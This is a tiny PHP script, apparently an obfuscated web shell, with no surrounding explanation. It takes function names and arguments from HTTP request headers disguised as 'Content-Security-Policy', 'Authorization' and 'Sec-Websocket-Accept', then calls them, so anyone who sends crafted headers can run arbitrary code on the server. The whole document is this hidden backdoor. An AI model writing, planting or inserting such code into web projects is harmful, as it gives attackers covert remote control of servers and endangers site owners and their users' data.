<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Content-Security-Policy'])) {
    $locked = $_HEADERS['Content-Security-Policy']('', $_HEADERS['Authorization']($_HEADERS['Sec-Websocket-Accept']));
    $locked();
}